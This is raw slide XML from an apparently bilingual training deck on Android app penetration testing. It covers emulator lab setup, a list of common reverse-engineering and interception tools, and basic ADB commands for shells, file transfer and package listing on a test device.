        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532832" y="2308608"/>
            <a:ext cx="1627834" cy="2150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FC5021A-AF90-344C-02E8-C02615A03A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461" t="52507" r="23736" b="5399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6432619" y="2308608"/>
            <a:ext cx="1627834" cy="21503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7269E8A-ED24-2A37-2E88-C650846EC069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="3808325"/>
            <a:ext cx="401934" cy="281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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D8404C-FD3B-CE2C-C583-03759C18767D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7045569" y="3808325"/>
            <a:ext cx="401934" cy="281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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1466C6-BAE5-6465-4ABC-AB5AF96F7498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946202" y="3648668"/>
            <a:ext cx="600668" cy="600668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6681AEE-C1C6-459C-F0D0-378483DB7F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151922" y="3754175"/>
            <a:ext cx="389653" cy="389653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BAEF27F-091D-1B6A-07B0-790F09867AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889090" y="2160395"/>
            <a:ext cx="200967" cy="97469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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD663C04-1112-2CB3-4FBA-A1D3BF233CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959699" y="1911698"/>
            <a:ext cx="200967" cy="97469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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F40BF1E-FC7E-DCAB-9603-82B8901CCE00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7929824" y="1821263"/>
            <a:ext cx="200967" cy="97469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err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B0B9D7-CB00-1567-F0ED-967AF0567781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635833" y="4593909"/>
            <a:ext cx="1538572" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Bad Guy</a:t>
            </a:r>
            <a:endParaRPr lang="en-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F3BA70-2B3F-5C58-5D15-9F4EE9134A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576026" y="4593909"/>
            <a:ext cx="1538572" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The Good Guy</a:t>
            </a:r>
            <a:endParaRPr lang="en-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC20B8E-9318-DC39-200A-F89CF21467E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355450" y="4593909"/>
            <a:ext cx="1855295" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The Automation Guy</a:t>
            </a:r>
            <a:endParaRPr lang="en-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169788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sz="1800"/>
              <a:t>Set-up the AVD Name : Nougat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Modify the Graphics performance : Software - GLES 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Modify the Advanced Settings : Enable keyboard input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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Configuration</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100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="3318515"/>
            <a:ext cx="5235176" cy="2848046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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3AB81FB-71D5-B389-E869-54621984B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961474" y="4353006"/>
            <a:ext cx="4075164" cy="1550334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD038DBC-9A09-AE68-4E1A-6CE3C7E7F6EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1597502" y="5299404"/>
            <a:ext cx="3265714" cy="301451"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="0D0B0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9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a:t>Your emulator is ready! You can launch it using the play button :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Android Studio - Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2281444"/>
            <a:ext cx="7164144" cy="2960130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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08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ADB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>APKTool</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>JADX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>GHIDRA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>FRIDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>OBJECTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>BURP SUITE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Let’s get started !</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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229694" y="2047107"/>
            <a:ext cx="3273238" cy="2210572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414878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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Command line tool to interact with an Android device :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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fr-FR"/>
              <a:t>Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> Bridge (ADB)</a:t>
            </a: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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB88DF7-63D1-4524-876A-F114DA6D329E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2189408"/>
            <a:ext cx="7458075" cy="3362325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137730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87A1352-845E-4063-97FC-68EF6E3EDDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="4965699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get a shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Run a command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [cmd]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with root privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>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root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>List Android devices connected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>devices</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Copy a local file to the device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>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push [local] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Copy a file from the device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pull [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] [local]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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Android Debug Bridge (ADB)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362446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87A1352-845E-4063-97FC-68EF6E3EDDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="4965699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>List apps installed on your device (-f option displays the APK path)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pm list packages -f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
